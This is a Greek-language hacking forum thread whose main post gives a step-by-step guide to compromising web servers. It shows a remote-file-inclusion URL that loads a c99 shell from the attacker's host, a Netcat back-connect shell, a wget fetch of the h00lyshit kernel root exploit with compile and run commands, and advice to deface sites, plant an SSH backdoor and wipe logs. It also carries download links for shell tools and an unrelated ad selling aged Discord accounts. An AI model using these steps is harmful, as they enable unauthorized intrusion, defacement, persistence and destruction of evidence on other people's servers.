Jump to content

[Hack] [GR]Hack a domain site!


MhtCeR™

Recommended Posts

Τα root exploits μας βοηθάνε να αποκτήσουμε δικαιώματα διαχειριστή σε ένα server.

 

Στο παράδειγμα που ακολουθεί σε server με Safe Mod: OFF χρειαζόμαστε:

 

1)Ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I

η ένα shell στον server που θα έχουμε ανεβάσει με κάποιο τρόπο p.x: ftp.

 

2)Ένα shell (c99,r57,storm,locus) η κάποιο άλλο τις επιλογής σας. (Προσοχή γιατί πολλά είναι backdoor και στέλνουν πληροφορίες σε κάποιον χρηστη για το που έχετε το shell,σε ποιον server.

 

http://rapidshare.com/files/164111549/c99.rar

 

3)Προώθηση μιας πόρτας στο router σας p.x: 1500

 

4)Ένα προγραμματάκι : Netcat V1.1

 

http://rapidshare.com/files/164104973/NETCAT_V1.1.rar

 

5)Root exploit το οποιο πρέπει να ταιριάζει με την έκδοση του πυρήνα του server.

 

 

Βρίσκουμε λοιπόν ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I όπως στο παράδειγμα πιο κάτω:

 

http://www.server.com/forum/index.php?page=

 

Μπορούμε να τρέξουμε από το δικό μας server το shell προσθέτοντας το δικό μας σύνδεσμο link στο τέλος:

 

http://www.server.com/forum/index.php?page=http://www.myserver.com/shell.txt?

 

Αυτό το link θα μας φορτώσει το shell όπου μπορούμε να δούμε την έκδοση του πυρήνα p.x:

 

 

 

Μετά από αυτό πρέπει να δημιουργήσουμε μια σύνδεση back connect με τον server χρησιμοποιώντας το ενσωματωμένο module του shell η ανεβάζοντας ένα δικό μας σε ένα φάκελο που μας δίνη το δικαίωμα (writeable).

 

Το πιο εύκολο είναι με το ενσωματωμένο back connect.

 

Ανοίγουμε λοιπόν το Netcat ώστε να είναι σε αναμονή και να περιμένει να γίνει η σύνδεση με το shell πηγαίνοντας:

 

Έναρξη -> Εκτέλεση -> και πληκτρολογούμε cmd

 

Μετά πηγαίνουμε στον φάκελο που είναι εγκατεστημένο το NetCat:

 

π.χ

 

 

   

cd C:\test\Netcat

 

 

 

Και δίνουμε την παρακάτω εντολή:

 

 

   

nc -l -v -n -p 1500

 

 

 

Το NetCat θα μας βγάλει: listening on [any] 1500 ...

 

Στην κεντρική σελίδα του c99 shell πηγαίνουμε εκεί που λέει Tools και στην δεύτερη σειρά παρατηρούμε το Back connection:

 

Εκεί που λέει HOST: βάζουμε την ip μας (μπορούμε να την βρούμε πηγαίνοντας στο site: www.whatismyip.com) και διπλα που λέει Port: 1500 (Είναι η πόρτα που έχουμε ανοίξει στο router μας)

 

Μετά πατάμε connect.

 

Αν τα έχουμε κάνει όλα σωστά θα πρέπει να συνδεθούμε με το netcat και προχωράμε στην διαδικασία του exploit.

 

Θα πρέπει να βρούμε ένα ένα φάκελο που μας δίνει το δικαίωμα (writeable) για να κατεβάσουμε και να κάνουμε compile το Root Exploit, το οποίο θα μας δώσει δικαιώματα διαχειριστή στον server.

 

Για να βρούμε ένα φάκελο που μας δίνει το δικαίωμα (writeable) μπορούμε να τρέξουμε την παρακάτω εντολή:

 

 

   

find / -perm -2 -ls

 

 

 

ή να χρησιμοποιήσουμε το φάκελο tmp που έχει πάντα δικαιώματα writeable.

 

Ας δούμε την περίπτωση του kernel 2.6.9 και την χρήση του φακέλου tmp.

 

Πληκτρολογούμε: cd /tmp

 

Για να κατεβάσουμε το root exploit (αν δεν το έχουμε ήδη έτοιμο compile) χρησιμοποιούμε την εντολή wget:

 

wget http://www.servermeexploits.com/h00lyshit.c

 

Μόλις το κατεβάσουμε θα πρέπει να κάνουμε compile ακολουθώντας τις οδηγίες που βρίσκουμε συνήθως στον κώδικα του exploit.

 

Για το h00lyshit πληκτρολογούμε:

 

 

 

 gcc h00lyshit.c -o h00lyshit

 

 

 

Έτσι δημιουργούμε το εκτελέσιμο αρχείο h00lyshit.

 

Τώρα πρέπει για να το τρέξουμε να δημιουργήσουμε ένα μεγάλο αρχείο στο δίσκο το οποιο χρειάζεται για την σωστή εκτέλεση του.

 

Για να δημιουργήσουμε ένα τέτοιο αρχείο σε κάποιο writeable φάκελο η στο /tmp όπως φαίνεται πιο κάτω στο παράδειγμα μας δίνουμε την εντολή:

 

 

   

dd if=/dev/urandom of=largefile count=2M

 

 

 

("largefile" είναι το όνομα αρχείου που δίνουμε)

 

Περιμένουμε μερικά λεπτά (2-3) μέχρι να ολοκληρωθεί η διαδικασία.

 

Αν δεν ολοκληρωθεί με επιτυχία μπορούμε να δοκιμάσουμε την εντολή:

 

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

 

 

 

Στο τελευταίο στάδιο που είναι η εκτέλεση του exploit δίνουμε την εντολή:

 

 

   

./h00lyshit /tmp/largefile

 

 

 

Αν στον server δεν έχει περαστεί το patch για τον συγκεκριμένο πυρήνα (kernel) θα μας δόση δικαιώματα διαχειριστή (root).

 

Για να το δούμε αυτό πατάμε:

 

 

   

whoami

 

 

 

Αν μας βγάλει root τότε τα κάναμε όλα σωστά !

 

 

Σαν root μπορούμε να κάνουμε όλα τα sites/forums/ deface του server η να βάλουμε κάποιο ssh backdoor όπως το SSHDoor.

 

Καλό θα είναι μετά από όλα αυτά να χρησιμοποιήσουμε κάπιο Log Cleaner όπως το MIG Log Cleaner.

 

Άν βρήτε κάπιο λάθος πείτε μου να το φτιάξω. :)

 

Credits: *Vazelos* (ο οποίος το έστειλε λίγο παλιά στο maxhackers.com)

 

 

Link to comment
Share on other sites

Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)

 

 

 

xD το τελευταίο κάνω σα να μην το είδα :) για τα άλλα δεν ξέρω.... εμένα μου φένεται χρήσιμο guide...

Link to comment
Share on other sites

To guide xrisimo einai, alla poios 8a katsei na ta diabasei ola ayta, poso mallon na ta kanei ki olas.

 

nai dikio exeis... oloi ektos apo legendary,gold,kai moderator einai tempeloskila xD... (e3erountai PANTA kapioi opws ton Coyote™)

 

 

EDITED: thnx kiolas :)

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • Both "MMO genre" AND "forums" are greatly deprecated those days. MMO genre, except very few games (TESO, WOW, BDO, FF14), is mostly "eaten" by fast paced games (aka games with 15-30min game parties, they are numerous). See Twitch best games, I doubt the top 10 are MMOs. Adding more MMOs categories, while MMOs themselves got less population, isn't a bright idea. Also, in the past, there was multiple games categories - none actually worked out, so far. Forums type were replaced by Discord, mostly. You communicate faster, you got voice, you can group up and it's already thematized (by server, by guild, by game,...)... Unfortunately, there is nothing you can do about. You already did it multiple times without success (3 or 4 times at least ?). It's not due to staff. MMO forum is just "niche" nowadays, while 20 years ago it was "dope" and the thing to do. Your main problem is MxC is a community based on "nothing". It was first cheater dedicated, then mostly L2 development dedicated,... With a mix of random things here and there. The formula is lightly-themed as "community" (that's actually why you still have some ppl posting), and in same time community never was expanded to retain ppl (notably through MxC servers - no matter the game : L2, GTA, Conan Exiles, Lost Ark, whatever else). In the end, you end with "nothing", since people comes and goes (and mostly goes, since MMO isn't a thing anymore), but both MMO genre is greatly endangered by other types of games AND forums isn't the proper way to communicate in 2024. Actually, the only use of a forums compared to Discord is to search through archives, and the main point is it's a better "showcase" than Discord (a static website would end with the same output). The proposed formula will never work, or at best will attract greedy ppl.
    • Welcome to my store :https://ultrasstore11.mysellix.io/fr/ 2015-2022 Aged Discord Account 2015 Discord Account : 50.99 $ 2016 Discord Account : 10.50 $ 2017 Discord Account :4.99 $ 2018 Discord Account : 3.99 $ 2019 Discord Account : 2.99 $ 2020 Discord Account :1.99$ 2021 Discord Account :1.50$ 2022 Discord Account :0.99$ Warranty :Lifetime Payment Methods : Crypto/ PayPal Contact Me On Discord Or Telegram Discord :@ultrasstore11 Telegram : https://t.me/ultrastore11  
    • Hello everyone,    As you can see lately, the L2 community is decreasing, especially on private servers, its been 21 years since Lineage2 release date (1st October 2003). MaxCheaters.com was created in 2005 (with different names) and till today we are basically focused on Lineage 2. We made several attempts to add other games, but everyone still knew us as an L2 based forum. MaxCheaters has a long history and is one of the few forums that have survived to this day,It would be a shame to let the site die.   So I came up with a few ideas to improve it and follow the trends.   1. Create a utility token, (evm or solana), that will be used for several things such as: Staffers/moderators payment. Content creators reward system. (influencers/advertising/topic creators) Paid forum support. Exchanges and marketplaces . Lineage 2 utility token for private servers. Other MMO utility token for buying/selling accounts/gold etc. Maxcheaters fixed expenses/improvements/development/expansion/design/topsite   2. Reduce l2 sections, (we done this before) , and add more games on main page Less l2 sections More MMO games Focus on marketplaces    3. Rebuild staffers team/more events. Add one staffer per MMO game. More active staffers on our team.   4. Social media activity / streaming Twtter / TikTok content for gaming.  Streaming platforms (create official channel) Moderators/content creators for this content specifically.
  • Topics

×
×
  • Create New...